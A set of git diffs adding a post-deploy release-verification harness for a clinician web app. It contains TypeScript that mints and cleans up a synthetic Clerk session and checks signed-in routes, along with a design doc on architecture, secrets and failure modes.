+  attempted: boolean;
+  ok: boolean;
+  detail: string;
+}
+
+/**
+ * Delete the synthetic org + user (best-effort, idempotent). Takes the `created`
+ * ids directly so it runs even when mint failed partway. Note: the backend has
+ * no delete API for the `User` row it upserts on first role-resolve, so one
+ * orphan DB row per run remains (placeholder `@*.local` email, non-colliding —
+ * see doc for the reconciliation follow-up).
+ */
+export async function cleanupClinician(
+  deps: SyntheticClinicianDeps,
+  created: { userId: string | null; orgId: string | null },
+): Promise<CleanupResult> {
+  if (!created.userId && !created.orgId) return { attempted: false, ok: true, detail: 'nothing to clean up' };
+  const fetchImpl = deps.fetchImpl ?? fetch;
+  const clerkApi = deps.clerkApiBase ?? DEFAULT_CLERK_API;
+  const problems: string[] = [];
+
+  if (created.orgId) {
+    try {
+      const res = await fetchImpl(`${clerkApi}/v1/organizations/${created.orgId}`, {
+        method: 'DELETE',
+        headers: backendHeaders(deps.clerkSecretKey),
+        signal: AbortSignal.timeout(15000),
+      });
+      if (!res.ok && res.status !== 404) problems.push(`org ${res.status}`);
+    } catch (err) {
+      problems.push(`org error ${(err as Error).message}`);
+    }
+  }
+
+  if (created.userId) {
+    try {
+      const res = await fetchImpl(`${clerkApi}/v1/users/${created.userId}`, {
+        method: 'DELETE',
+        headers: backendHeaders(deps.clerkSecretKey),
+        signal: AbortSignal.timeout(15000),
+      });
+      if (!res.ok && res.status !== 404) problems.push(`user ${res.status}`);
+    } catch (err) {
+      problems.push(`user error ${(err as Error).message}`);
+    }
+  }
+
+  return problems.length
+    ? { attempted: true, ok: false, detail: `cleanup issues: ${problems.join(', ')}` }
+    : { attempted: true, ok: true, detail: 'deleted synthetic user + org' };
+}

--- a/apps/web/lib/release-monitor/syntheticClinician.ts
+++ b/apps/web/lib/release-monitor/syntheticClinician.ts
@@ -2,7 +2,7 @@
  * Synthetic signed-in-clinician harness (Clerk Backend API + FAPI).
  *
  * Reproduces a real active Clerk clinician session end-to-end so the release
- * monitor can black-box the signed-in `/holder/*` flow the way a real user
+ * monitor can black-box the signed-in `/holder` flow the way a real user
  * experiences it — the same technique used to diagnose the signed-in-clinician
  * P0 (memory `signed_in_clinician_auth_p0.md`), promoted here from a throwaway
  * session script into tested, reusable code.

--- a/apps/web/lib/release-monitor/syntheticClinician.ts
+++ b/apps/web/lib/release-monitor/syntheticClinician.ts
@@ -27,6 +27,7 @@ import {
   isAuthErrorPath,
   isResolvingPath,
   isSignInPath,
+  pathOf,
   type NavHop,
   type NavOutcome,
 } from './holderRoutes';
@@ -154,6 +155,12 @@ export async function mintClinicianSession(deps: SyntheticClinicianDeps): Promis
   const email = `svc-monitor+${deps.runId}@vitalcv-monitor.local`;
   const created: { userId: string | null; orgId: string | null } = { userId: null, orgId: null };
   const jar: Record<string, string> = {};
+
+  // Fail fast with a crisp operator message — an empty key would otherwise
+  // surface as a cryptic Clerk 401 ("Invalid Authorization header format").
+  if (!deps.clerkSecretKey.trim()) {
+    return { ok: false, created, error: 'CLERK_SECRET_KEY is not set — cannot mint a synthetic clinician' };
+  }
 
   try {
     // 1. Create the synthetic user (role hint in metadata; the backend upsert is authoritative).
@@ -340,7 +347,16 @@ export async function warmUpClinicianSession(
     const location = res.headers.get('location');
     hops.push({ url: relPath(url), status: res.status, location });
 
-    if (res.status === 200) return { ok: true, hops };
+    if (res.status === 200) {
+      // The 200 must be ON the clinician surface. A role-mismatch redirect
+      // (middleware sends a wrong-role user to its ROLE_LANDING, which 200s)
+      // must fail, not pass — the whole point is that a CLINICIAN reaches /holder.
+      const finalPath = pathOf(url);
+      if (finalPath !== '/holder' && !finalPath.startsWith('/holder/')) {
+        return { ok: false, hops, reason: `wrong_destination ${finalPath}` };
+      }
+      return { ok: true, hops };
+    }
 
     if (res.status >= 300 && res.status < 400 && location) {
       if (isAuthErrorPath(location)) return { ok: false, hops, reason: 'auth_error' };
@@ -397,7 +413,9 @@ export async function reachRoute(
     }
     break;
   }
-  return analyzeNavigation(hops);
+  // Enforce the terminal path is the requested surface (or under it) — a
+  // role-mismatch redirect that 200s elsewhere is a failure, not a pass.
+  return analyzeNavigation(hops, pathOf(path));
 }
 
 export interface CleanupResult {

--- a/apps/web/lib/release-monitor/verify.ts
+++ b/apps/web/lib/release-monitor/verify.ts
@@ -56,9 +56,6 @@ export interface VerifyDeps {
   reach: (session: ClinicianSession, path: string) => Promise<NavOutcome>;
   runDeployCheck: () => Promise<{ ok: boolean; detail: string }>;
   cleanup: (created: { userId: string | null; orgId: string | null }) => Promise<CleanupResult>;
-  /** Invoked as soon as mint reports created ids, so a caller can clean up on
-   *  a hard process kill (e.g. a GitHub step timeout) that skips the finally. */
-  onCreated?: (created: { userId: string | null; orgId: string | null }) => void;
 }
 
 function short(sha: string | null | undefined): string {
@@ -103,7 +100,6 @@ export async function runReleaseVerification(deps: VerifyDeps): Promise<ReleaseV
     // 3. Mint a synthetic clinician session.
     const minted = await deps.mint();
     created = minted.created;
-    deps.onCreated?.(created);
     if (!minted.ok || !minted.session) {
       checks.push({ name: 'synthetic_session', ok: false, critical: true, detail: minted.error ?? 'mint failed' });
       for (const r of routes) {

--- a/apps/web/lib/release-monitor/verify.ts
+++ b/apps/web/lib/release-monitor/verify.ts
@@ -56,6 +56,9 @@ export interface VerifyDeps {
   reach: (session: ClinicianSession, path: string) => Promise<NavOutcome>;
   runDeployCheck: () => Promise<{ ok: boolean; detail: string }>;
   cleanup: (created: { userId: string | null; orgId: string | null }) => Promise<CleanupResult>;
+  /** Invoked as soon as mint reports created ids, so a caller can clean up on
+   *  a hard process kill (e.g. a GitHub step timeout) that skips the finally. */
+  onCreated?: (created: { userId: string | null; orgId: string | null }) => void;
 }
 
 function short(sha: string | null | undefined): string {
@@ -100,6 +103,7 @@ export async function runReleaseVerification(deps: VerifyDeps): Promise<ReleaseV
     // 3. Mint a synthetic clinician session.
     const minted = await deps.mint();
     created = minted.created;
+    deps.onCreated?.(created);
     if (!minted.ok || !minted.session) {
       checks.push({ name: 'synthetic_session', ok: false, critical: true, detail: minted.error ?? 'mint failed' });
       for (const r of routes) {
@@ -146,6 +150,14 @@ export async function runReleaseVerification(deps: VerifyDeps): Promise<ReleaseV
     } catch (err) {
       cleanup = { attempted: true, ok: false, detail: `cleanup threw: ${(err as Error).message}` };
     }
+  }
+
+  // A failed cleanup leaves a synthetic clinician identity live in production
+  // Clerk — for a trust product that must NOT pass silently. Critical, so it
+  // reddens the status and lands in failedChecks. (The upserted backend User
+  // row has no delete API and is a separately-documented residual, not this.)
+  if (cleanup.attempted && !cleanup.ok) {
+    checks.push({ name: 'cleanup', ok: false, critical: true, detail: `synthetic identity NOT deleted: ${cleanup.detail}` });
   }
 
   const failedChecks = checks.filter((c) => c.critical && !c.ok).map((c) => c.name);

--- a/apps/web/lib/release-monitor/verify.ts
+++ b/apps/web/lib/release-monitor/verify.ts
@@ -1,0 +1,164 @@
+/**
+ * Release-verification orchestration (pure over injected probes).
+ *
+ * Sequences the post-deploy checks and produces one structured pass/fail
+ * report. All I/O is injected so the ordering, pass/fail logic, and the
+ * cleanup-always guarantee are unit-testable without network or timers. The
+ * sleepy part — polling `/api/version` until the container serves the target
+ * commit — lives in the runner (`scripts/release-verify.ts`), which resolves
+ * `containerSha`/`mainSha` and passes them in as data.
+ *
+ * Check model: each check carries `critical`. `overall` fails iff any critical
+ * check fails. The signed-in `/holder` reachability + `check:deploy` are
+ * critical; `/auth/resolving` and (for non-webhook runs) SHA-match are reported
+ * but non-critical — see the doc for the benign non-web-commit lag rationale.
+ */
+
+import { HOLDER_ROUTES, pathOf, type NavOutcome } from './holderRoutes';
+import type { ClinicianSession, CleanupResult, MintResult, WarmUpResult } from './syntheticClinician';
+
+export interface ReleaseCheck {
+  name: string;
+  ok: boolean;
+  critical: boolean;
+  detail: string;
+}
+
+export interface ReleaseVerificationReport {
+  startedAt: string;
+  finishedAt: string;
+  base: string;
+  /** Deploy commit from the webhook client_payload, if this run is deploy-scoped. */
+  targetSha: string | null;
+  mainSha: string | null;
+  containerSha: string | null;
+  checks: ReleaseCheck[];
+  overall: 'pass' | 'fail';
+  failedChecks: string[];
+  cleanup: CleanupResult;
+}
+
+export interface VerifyDeps {
+  base: string;
+  /** Resolved by the runner (after the SHA poll). */
+  containerSha: string | null;
+  mainSha: string | null;
+  /** Deploy commit (webhook). When present, the SHA check is critical. */
+  targetSha?: string | null;
+  routes?: readonly string[];
+  isoNow?: () => string;
+
+  // injected probes — implementations return result shapes, never throw
+  probeResolving: () => Promise<{ status: number }>;
+  mint: () => Promise<MintResult>;
+  warmUp: (session: ClinicianSession) => Promise<WarmUpResult>;
+  refresh: (session: ClinicianSession) => Promise<boolean>;
+  reach: (session: ClinicianSession, path: string) => Promise<NavOutcome>;
+  runDeployCheck: () => Promise<{ ok: boolean; detail: string }>;
+  cleanup: (created: { userId: string | null; orgId: string | null }) => Promise<CleanupResult>;
+}
+
+function short(sha: string | null | undefined): string {
+  return sha ? sha.slice(0, 9) : '∅';
+}
+
+export async function runReleaseVerification(deps: VerifyDeps): Promise<ReleaseVerificationReport> {
+  const isoNow = deps.isoNow ?? (() => new Date().toISOString());
+  const startedAt = isoNow();
+  const routes = deps.routes ?? HOLDER_ROUTES;
+  const checks: ReleaseCheck[] = [];
+  let created: { userId: string | null; orgId: string | null } = { userId: null, orgId: null };
+  let cleanup: CleanupResult = { attempted: false, ok: true, detail: 'not reached' };
+
+  try {
+    // 1. Deployed web SHA. effectiveTarget = the deploy commit (webhook) or main HEAD.
+    const effectiveTarget = deps.targetSha ?? deps.mainSha;
+    const shaCritical = Boolean(deps.targetSha);
+    const shaOk = Boolean(
+      deps.containerSha && effectiveTarget && deps.containerSha.toLowerCase() === effectiveTarget.toLowerCase(),
+    );
+    checks.push({
+      name: 'web_sha',
+      ok: shaOk,
+      critical: shaCritical,
+      detail: shaOk
+        ? `container ${short(deps.containerSha)} == ${deps.targetSha ? 'deploy' : 'main'} ${short(effectiveTarget)}`
+        : `container ${short(deps.containerSha)} != ${short(effectiveTarget)} (${
+            deps.targetSha ? 'deploy commit — new code not serving' : 'main HEAD — possible benign non-web-commit lag'
+          })`,
+    });
+
+    // 2. Public interstitial reachability (reported).
+    const resolving = await deps.probeResolving();
+    checks.push({
+      name: 'auth_resolving',
+      ok: resolving.status === 200,
+      critical: false,
+      detail: `/auth/resolving → ${resolving.status}${resolving.status === 404 ? ' (interstitial not deployed)' : ''}`,
+    });
+
+    // 3. Mint a synthetic clinician session.
+    const minted = await deps.mint();
+    created = minted.created;
+    if (!minted.ok || !minted.session) {
+      checks.push({ name: 'synthetic_session', ok: false, critical: true, detail: minted.error ?? 'mint failed' });
+      for (const r of routes) {
+        checks.push({ name: `holder:${r}`, ok: false, critical: true, detail: 'skipped — no session' });
+      }
+    } else {
+      const session = minted.session;
+      checks.push({ name: 'synthetic_session', ok: true, critical: true, detail: `minted clinician ${session.userId}` });
+
+      // 4. Cold-start navigation — the P0 detector.
+      const warm = await deps.warmUp(session);
+      checks.push({
+        name: 'holder:cold-start',
+        ok: warm.ok,
+        critical: true,
+        detail: warm.ok
+          ? `resolved in ${warm.hops.length} hop(s)`
+          : `cold /holder failed: ${warm.reason} [${warm.hops.map((h) => `${pathOf(h.url)}→${h.status}`).join(' ')}]`,
+      });
+
+      // 5. Widen the 60s JWT window before the sweep (best-effort, not a check).
+      await deps.refresh(session);
+
+      // 6. Steady-state reachability of every required route.
+      for (const r of routes) {
+        const outcome = await deps.reach(session, r);
+        checks.push({
+          name: `holder:${r}`,
+          ok: outcome.ok,
+          critical: true,
+          detail: outcome.ok
+            ? `200 in ${outcome.hops} hop(s)`
+            : `${outcome.reason ?? 'fail'} (final ${outcome.finalStatus ?? '∅'} ${outcome.finalUrl ?? ''})`,
+        });
+      }
+    }
+
+    // 7. Deployment integrity (pnpm check:deploy).
+    const deploy = await deps.runDeployCheck();
+    checks.push({ name: 'deploy_integrity', ok: deploy.ok, critical: true, detail: deploy.detail });
+  } finally {
+    try {
+      cleanup = await deps.cleanup(created);
+    } catch (err) {
+      cleanup = { attempted: true, ok: false, detail: `cleanup threw: ${(err as Error).message}` };
+    }
+  }
+
+  const failedChecks = checks.filter((c) => c.critical && !c.ok).map((c) => c.name);
+  return {
+    startedAt,
+    finishedAt: isoNow(),
+    base: deps.base,
+    targetSha: deps.targetSha ?? null,
+    mainSha: deps.mainSha ?? null,
+    containerSha: deps.containerSha ?? null,
+    checks,
+    overall: failedChecks.length ? 'fail' : 'pass',
+    failedChecks,
+    cleanup,
+  };
+}

--- a/docs/deployment/release-monitoring.md
+++ b/docs/deployment/release-monitoring.md
@@ -93,8 +93,8 @@ in a Railway webhook URL. The receiver holds the GitHub token server-side
 | `web_sha` | Critical **only** for a webhook run | Container-served commit vs the target. For a webhook run the target is the deploy commit (exact). For a scheduled run the target is main HEAD, and a lag can be a *benign non-web commit* (web isn't redeployed by an API/docs-only merge), so it is reported, not fatal. |
 | `auth_resolving` | Reported | `GET /auth/resolving` → 200. 404 until the interstitial (#507) ships; the hard gate below is fix-shape-agnostic. |
 | `synthetic_session` | Critical | A synthetic CLINICIAN session was minted. |
-| `holder:cold-start` | Critical | A fresh session reaching `/holder` resolves (200) rather than bouncing to `/auth/error` — the direct P0 detector. |
-| `holder:/holder…` (×6) | Critical | Each required surface returns 200, never passing through `/auth/error`, never looping. |
+| `holder:cold-start` | Critical | A fresh session reaching `/holder` resolves to a 200 **on `/holder`** rather than bouncing to `/auth/error` — the direct P0 detector. |
+| `holder:/holder…` (×6) | Critical | Each required surface returns 200 **on the requested path** (`wrong_destination` otherwise — a role-mismatch redirect that 200s on another role's landing must fail, not pass), never passing through `/auth/error`, never looping. |
 | `deploy_integrity` | Critical | `pnpm check:deploy` exits 0 (no cross-service drift). |
 
 Overall = **fail** if any critical check fails.
@@ -128,8 +128,15 @@ https://vitalcv.com/api/internal/release-monitor/webhook?token=<RELEASE_WEBHOOK_
 
 | Var | Purpose |
 | --- | --- |
-| `GITHUB_DISPATCH_TOKEN` | Fine-grained PAT, **contents: write** on `ctol3r/vitalcv`, to fire `repository_dispatch`. |
+| `GITHUB_DISPATCH_TOKEN` | Fine-grained PAT to fire `repository_dispatch`. **Minimal scope:** single repository (`ctol3r/vitalcv`), Contents: read+write, nothing else, with an expiry. It can trigger workflows but cannot read secrets or push (branch protection applies). |
 | `RELEASE_WEBHOOK_TOKEN` | Shared secret in the webhook URL. May reuse the existing `CRON_SECRET` instead (the receiver accepts it as a fallback). |
+
+> **Token-in-URL caveat:** Railway webhooks cannot attach custom headers, so the
+> secret rides in the `?token=` query string, which can surface in edge/access
+> logs. Accepted risk: the endpoint is not destructive — a leaked token lets an
+> attacker *trigger verification runs* (bounded by workflow concurrency), never
+> deploy, mutate, or read anything. Rotate it if a leak is suspected; the
+> receiver also accepts `Authorization: Bearer` if Railway adds header support.
 
 **3. GitHub repository secrets** (for the workflow)
 
@@ -160,6 +167,35 @@ on first role-resolve, so each run leaves one orphan DB row (placeholder-pattern
 email, non-colliding). A backend cleanup endpoint or a periodic reconciliation
 sweep is a follow-up.
 
+## Rollout & rollback
+
+**Rollout is inherently staged and safe:**
+
+1. **Merge = no-op.** Nothing calls the receiver, and the workflow's
+   `repository_dispatch` never fires until the Railway webhook exists. The
+   scheduled run starts reporting (red today — see `/auth/resolving` note),
+   but posts statuses only; it gates nothing.
+2. Add the GitHub secrets → `workflow_dispatch` a manual run to validate.
+3. Add the Railway webhook + service vars → per-deploy verification is live.
+
+**Rollback / disable (any of these, no state to clean up):**
+
+- Delete the webhook in Railway (stops per-deploy triggers), and/or
+- Disable the *Release verify* workflow in the Actions UI (stops everything,
+  including the schedule), and/or
+- Remove `GITHUB_DISPATCH_TOKEN` from the web service (receiver returns 500,
+  fail-closed, and logs it).
+
+Commit statuses already posted are inert history; nothing consumes them as a
+gate. The receiver route itself is harmless when unwired — it fails closed
+(500) with no secrets configured.
+
+**Fail-closed matrix:** no receiver secret → 500, never dispatches · missing
+`GITHUB_DISPATCH_TOKEN` → 500 + container log · missing `CLERK_SECRET_KEY` on
+the runner → crisp `synthetic_session` failure → red status · missing
+`RAILWAY_API_TOKEN` → `deploy_integrity` failure → red status. No missing
+secret can produce a false green.
+
 ## Failure modes
 
 - **Webhook missed / receiver briefly down** → the `*/30` scheduled run catches
@@ -169,6 +205,12 @@ sweep is a follow-up.
 - **Benign SHA lag** (web not redeployed by a non-web commit) → `web_sha` is
   reported, not fatal, on scheduled runs; exact on webhook runs.
 - **JWT 60s TTL** → the runner re-mints the session token before the route sweep.
+- **Hung verification** → the verify step is bounded (12 min) below the job
+  budget (15 min), so the status-recording step always runs — a hang yields a
+  red status, never a silently-killed job with no status.
+- **Role mis-resolution** → a wrong-role session that 200s on another role's
+  landing fails as `wrong_destination`; a clean-looking redirect chain that
+  never reached `/holder` cannot pass.
 
 ## Runbook
 

--- a/docs/deployment/release-monitoring.md
+++ b/docs/deployment/release-monitoring.md
@@ -1,0 +1,193 @@
+# Release monitoring — durable signed-in verification of every web deploy
+
+**Status:** implemented (this PR). Owner wiring (Railway webhook + secrets) is
+required before the pipeline goes live — see [Owner wiring](#owner-wiring).
+
+## Why this exists
+
+During the signed-in-clinician P0, **every** authenticated clinician was
+redirected to `/auth/error` before any `/holder/*` page rendered in production —
+and the only way we found out was a Claude session hand-minting a synthetic
+Clerk session and polling `/holder`. That verification was ephemeral: it ran
+once, in a chat, and left nothing behind. Two structural gaps made it necessary
+and un-automatable:
+
+1. **No web SHA source.** The web `/api/health` route exposes no commit, so "is
+   the new code actually serving?" could only be *proxied* by a route-presence
+   check. `deployment-integrity.ts` can read the Railway *control-plane* commit
+   (what Railway *thinks* is deployed) with a `RAILWAY_API_TOKEN`, but that is
+   not the same as what the running **container** is actually serving.
+2. **No standing verifier.** `deploy-web.yml` does a fixed `sleep 120` then
+   curls `/api/health` — it races the deploy, never knows when the deploy
+   actually *succeeded*, and only checks that the process is up, not that a
+   signed-in clinician can use the product.
+
+This system closes both: a Railway deploy webhook triggers an **external**
+end-to-end verification of the signed-in flow, and the result is a durable
+GitHub commit status on the verified SHA. No Claude session in the loop.
+
+## Architecture
+
+```
+Railway web deploy SUCCESS
+   │  Railway Project → Webhooks: POST deploy payload
+   ▼
+POST /api/internal/release-monitor/webhook      ← thin bridge, runs in web container
+   │  • auth: shared secret (Bearer / x-monitoring-secret / ?token=)
+   │  • parse Railway payload → web-service SUCCESS deploy?
+   │  • if yes → GitHub repository_dispatch("release-verify")   [GITHUB_DISPATCH_TOKEN]
+   │  • 202 immediately — does NO verification itself
+   ▼
+.github/workflows/release-verify.yml            ← EXTERNAL vantage (a real-user viewpoint)
+   triggers: repository_dispatch[release-verify] + schedule(*/30) + workflow_dispatch
+   │  pnpm verify:release → scripts/release-verify.ts:
+   │    1. target = deploy commit (webhook) or GitHub main HEAD
+   │    2. poll /api/version until the container serves the target commit
+   │    3. GET /auth/resolving → 200 (reported)
+   │    4. mint a synthetic CLINICIAN session (Clerk Backend API + FAPI ticket)
+   │    5. reach the 6 /holder routes — no /auth/error, no loop   ← HARD GATE
+   │    6. pnpm check:deploy (deployment integrity)
+   │    7. cleanup the synthetic user + org (always)
+   ▼
+GitHub commit status on the verified SHA        ← DURABLE SIGNAL
+   context "vitalcv/release-verified" · success/failure · target_url = the run
+```
+
+### Why the harness runs on GitHub Actions, not in the container
+
+The P0 root cause was that the middleware's role-resolution self-fetch fails as
+a **hairpin** inside the Railway container. Any verifier that runs *inside* the
+web container and calls the public origin risks the same failure. Running on a
+GitHub runner gives a true external, black-box, real-user vantage — exactly what
+we need to trust the result. The webhook receiver stays in the container only
+because that is where the Railway webhook can reach; it does no verification and
+returns immediately.
+
+### Why the thin webhook bridge
+
+Railway webhooks can only POST to a URL. GitHub's `repository_dispatch` needs an
+auth header Railway can't reliably attach, and we do not want a GitHub PAT living
+in a Railway webhook URL. The receiver holds the GitHub token server-side
+(`GITHUB_DISPATCH_TOKEN`) and validates a Railway-side shared secret. The
+`schedule` trigger is the backstop if a webhook is ever missed.
+
+## Components
+
+| Piece | Path | Notes |
+| --- | --- | --- |
+| Version endpoint | `apps/web/app/api/version/route.ts` | Full commit SHA, `no-store`. Distinct from `/api/deploy-info` (cached 60s, 7-char SHA). |
+| Version reader | `apps/web/lib/deployInfo.ts` → `getVersionInfo()` | Reads `RAILWAY_GIT_COMMIT_SHA` (runtime-injected). |
+| Webhook parse/decide | `apps/web/lib/release-monitor/railwayWebhook.ts` | Pure; tolerant of Railway payload drift. |
+| GitHub dispatch | `apps/web/lib/release-monitor/githubDispatch.ts` | `repository_dispatch`; `fetch` injected. |
+| Webhook receiver | `apps/web/app/api/internal/release-monitor/webhook/{route,_handler}.ts` | Auth via `checkAuth`-style secret + `?token=`. |
+| Synthetic clinician | `apps/web/lib/release-monitor/syntheticClinician.ts` | Clerk Backend API + FAPI mint / warm-up / reach / cleanup. |
+| Route set + classifier | `apps/web/lib/release-monitor/holderRoutes.ts` | The 6 routes + `analyzeNavigation`. |
+| Orchestrator | `apps/web/lib/release-monitor/verify.ts` | Pure over injected probes; cleanup in `finally`. |
+| Runner | `scripts/release-verify.ts` (`pnpm verify:release`) | Wires real I/O; runs `check:deploy`; exits 0/1. |
+| Workflow | `.github/workflows/release-verify.yml` | Runs the runner; posts the commit status. |
+
+## The checks
+
+| Check | Critical? | Meaning |
+| --- | --- | --- |
+| `web_sha` | Critical **only** for a webhook run | Container-served commit vs the target. For a webhook run the target is the deploy commit (exact). For a scheduled run the target is main HEAD, and a lag can be a *benign non-web commit* (web isn't redeployed by an API/docs-only merge), so it is reported, not fatal. |
+| `auth_resolving` | Reported | `GET /auth/resolving` → 200. 404 until the interstitial (#507) ships; the hard gate below is fix-shape-agnostic. |
+| `synthetic_session` | Critical | A synthetic CLINICIAN session was minted. |
+| `holder:cold-start` | Critical | A fresh session reaching `/holder` resolves (200) rather than bouncing to `/auth/error` — the direct P0 detector. |
+| `holder:/holder…` (×6) | Critical | Each required surface returns 200, never passing through `/auth/error`, never looping. |
+| `deploy_integrity` | Critical | `pnpm check:deploy` exits 0 (no cross-service drift). |
+
+Overall = **fail** if any critical check fails.
+
+## Durable signal
+
+The primary durable record is a **GitHub commit status** on the verified SHA:
+
+- context `vitalcv/release-verified`, state `success`/`failure`,
+  `target_url` = the workflow run, description = e.g. `pass: holder 6/6`.
+- Survives deploys, is keyed by SHA, and is queryable:
+  `gh api repos/ctol3r/vitalcv/commits/<sha>/status`.
+
+The GitHub Actions run itself (logs + job summary + red/green) is a second
+durable record. Surfacing the status on the Ops Center (`/admin/platform`) is a
+documented follow-up (see below) — the commit status is already queryable, so a
+read-through card is a small later add.
+
+## Owner wiring
+
+None of this can be done from a code change — it needs the Railway dashboard and
+repo/service secrets.
+
+**1. Railway Project → Webhooks** — add:
+
+```
+https://vitalcv.com/api/internal/release-monitor/webhook?token=<RELEASE_WEBHOOK_TOKEN>
+```
+
+**2. Railway `vitalcv-web` service variables**
+
+| Var | Purpose |
+| --- | --- |
+| `GITHUB_DISPATCH_TOKEN` | Fine-grained PAT, **contents: write** on `ctol3r/vitalcv`, to fire `repository_dispatch`. |
+| `RELEASE_WEBHOOK_TOKEN` | Shared secret in the webhook URL. May reuse the existing `CRON_SECRET` instead (the receiver accepts it as a fallback). |
+
+**3. GitHub repository secrets** (for the workflow)
+
+| Secret | Purpose |
+| --- | --- |
+| `CLERK_SECRET_KEY` | Clerk Backend API — mint/cleanup the synthetic clinician. |
+| `RAILWAY_API_TOKEN` | `check:deploy` GraphQL fallback (no linked CLI on the runner). |
+| `CLERK_FAPI_URL` | Optional; defaults to `https://clerk.vitalcv.com`. |
+| `RELEASE_PROBE_BASE` | Optional; defaults to `https://vitalcv.com`. |
+
+`GITHUB_TOKEN` (automatic) posts the commit status — the workflow declares
+`permissions: statuses: write`.
+
+## Synthetic clinician + cleanup
+
+The harness mints a real active Clerk session (Backend API create user → org →
+`sign_in_tokens` → FAPI ticket redemption → active-org touch → `__session` JWT),
+exercises the signed-in flow the way a browser does (manual redirect-following,
+capturing the `vitalcv_role` cookie the flow mints), then **deletes the Clerk
+user + org** — always, even on a mid-run failure (the runner passes the created
+ids to `cleanupClinician` from a `finally`).
+
+Every synthetic identity uses an `@vitalcv-monitor.local` email so it can never
+collide with, or rebind (per #504), a real user row.
+
+**Known residual:** the backend has no delete API for the `User` row it upserts
+on first role-resolve, so each run leaves one orphan DB row (placeholder-pattern
+email, non-colliding). A backend cleanup endpoint or a periodic reconciliation
+sweep is a follow-up.
+
+## Failure modes
+
+- **Webhook missed / receiver briefly down** → the `*/30` scheduled run catches
+  it. The signal is never stored in-process, so it can't be lost to the
+  in-memory-store-resets race that affects the source-health probe.
+- **Container hairpin** → avoided entirely by the external GitHub-runner vantage.
+- **Benign SHA lag** (web not redeployed by a non-web commit) → `web_sha` is
+  reported, not fatal, on scheduled runs; exact on webhook runs.
+- **JWT 60s TTL** → the runner re-mints the session token before the route sweep.
+
+## Runbook
+
+- **Read the latest signal:** the `vitalcv/release-verified` commit status on
+  main HEAD (GitHub commit view, or `gh api repos/ctol3r/vitalcv/commits/main/status`).
+- **A red status** → open the linked run; the job summary lists the failing
+  checks. `holder:*` red = the signed-in flow is broken for real clinicians
+  (treat as a P0). `web_sha` red on a webhook run = the new code is not serving.
+- **Re-run manually:** Actions → *Release verify* → *Run workflow* (optionally
+  pass a `target_sha`).
+- **Run locally against prod:**
+  `CLERK_SECRET_KEY=… RAILWAY_API_TOKEN=… pnpm verify:release --out /tmp/r.json`
+  (exits non-zero, and that is the honest signal, while the P0/`/auth/resolving`
+  interstitial is unmerged).
+
+## Follow-ups (not in this PR)
+
+- Ops Center card at `/admin/platform` reading the commit status.
+- Slack notification (`SLACK_WEBHOOK_URL`), status-doc committer.
+- Backend cleanup endpoint / reconciliation sweep for the orphaned `User` row.
+- Retire the now-redundant fixed-`sleep 120` smoke test in `deploy-web.yml`
+  (this system supersedes its intent).

--- a/docs/deployment/release-monitoring.md
+++ b/docs/deployment/release-monitoring.md
@@ -176,8 +176,10 @@ echo the short-lived sign-in ticket.
 
 **Hard-kill window:** a GitHub step timeout (or SIGKILL) can terminate the
 process before the normal `finally` cleanup. The runner registers a
-SIGTERM/SIGINT handler for best-effort cleanup, but a hard kill can still leak
-one synthetic identity.
+SIGTERM/SIGINT handler for best-effort cleanup, and the synthetic layer reports
+each created id *incrementally* (the instant the Clerk user, then org, exists) —
+so a kill mid-mint still cleans up a just-created user. A SIGKILL (no grace) or
+the microsecond gap before the id is reported can still leak one identity.
 
 **Required backstop (guaranteed cleanup):** a periodic reconciliation sweep MUST
 delete any stale synthetic identities — Clerk users with

--- a/docs/deployment/release-monitoring.md
+++ b/docs/deployment/release-monitoring.md
@@ -96,8 +96,16 @@ in a Railway webhook URL. The receiver holds the GitHub token server-side
 | `holder:cold-start` | Critical | A fresh session reaching `/holder` resolves to a 200 **on `/holder`** rather than bouncing to `/auth/error` — the direct P0 detector. |
 | `holder:/holder…` (×6) | Critical | Each required surface returns 200 **on the requested path** (`wrong_destination` otherwise — a role-mismatch redirect that 200s on another role's landing must fail, not pass), never passing through `/auth/error`, never looping. |
 | `deploy_integrity` | Critical | `pnpm check:deploy` exits 0 (no cross-service drift). |
+| `cleanup` (only if it fails) | Critical | The synthetic Clerk user + org were deleted. A failed delete leaves a synthetic identity live in production Clerk — for a trust product that must **not** pass green, so it reddens the status. |
 
 Overall = **fail** if any critical check fails.
+
+The webhook trigger **fails closed**: `shouldTriggerVerification` fires only when
+the payload positively proves a web-service SUCCESS deploy in the target
+environment (service **and** environment name present and matching). An
+absent/ambiguous service or env is skipped — a non-web deploy arriving in a
+drifted payload must never run web verification and paint a false-red status on
+an unrelated commit. A genuinely-missed webhook is backstopped by the schedule.
 
 ## Durable signal
 
@@ -160,12 +168,25 @@ user + org** — always, even on a mid-run failure (the runner passes the create
 ids to `cleanupClinician` from a `finally`).
 
 Every synthetic identity uses an `@vitalcv-monitor.local` email so it can never
-collide with, or rebind (per #504), a real user row.
+collide with, or rebind (per #504), a real user row. A **failed** delete is a
+critical check → red status (a leaked synthetic identity is never silently
+green). Error bodies from Clerk/FAPI are reduced to safe code+message fields
+(`safeErrorBody`) before they can reach logs or `report.json` — a raw body could
+echo the short-lived sign-in ticket.
 
-**Known residual:** the backend has no delete API for the `User` row it upserts
-on first role-resolve, so each run leaves one orphan DB row (placeholder-pattern
-email, non-colliding). A backend cleanup endpoint or a periodic reconciliation
-sweep is a follow-up.
+**Hard-kill window:** a GitHub step timeout (or SIGKILL) can terminate the
+process before the normal `finally` cleanup. The runner registers a
+SIGTERM/SIGINT handler for best-effort cleanup, but a hard kill can still leak
+one synthetic identity.
+
+**Required backstop (guaranteed cleanup):** a periodic reconciliation sweep MUST
+delete any stale synthetic identities — Clerk users with
+`public_metadata.synthetic === true` / `@vitalcv-monitor.local` emails and their
+orgs older than a few minutes. This covers both the hard-kill window and any
+transient Clerk delete failure. **Known residual:** the backend has no delete API
+for the `User` row it upserts on first role-resolve, so each run also leaves one
+orphan DB row (placeholder-pattern email, non-colliding); the same sweep (or a
+backend cleanup endpoint) should reap it.
 
 ## Rollout & rollback
 
@@ -230,6 +251,9 @@ secret can produce a false green.
 
 - Ops Center card at `/admin/platform` reading the commit status.
 - Slack notification (`SLACK_WEBHOOK_URL`), status-doc committer.
-- Backend cleanup endpoint / reconciliation sweep for the orphaned `User` row.
+- **Reconciliation sweep (recommended before heavy reliance):** reap stale
+  synthetic Clerk identities (`public_metadata.synthetic` / `@vitalcv-monitor.local`)
+  + a backend cleanup endpoint for the orphaned `User` row. Guarantees no leak
+  survives a hard-kill or a transient Clerk delete failure.
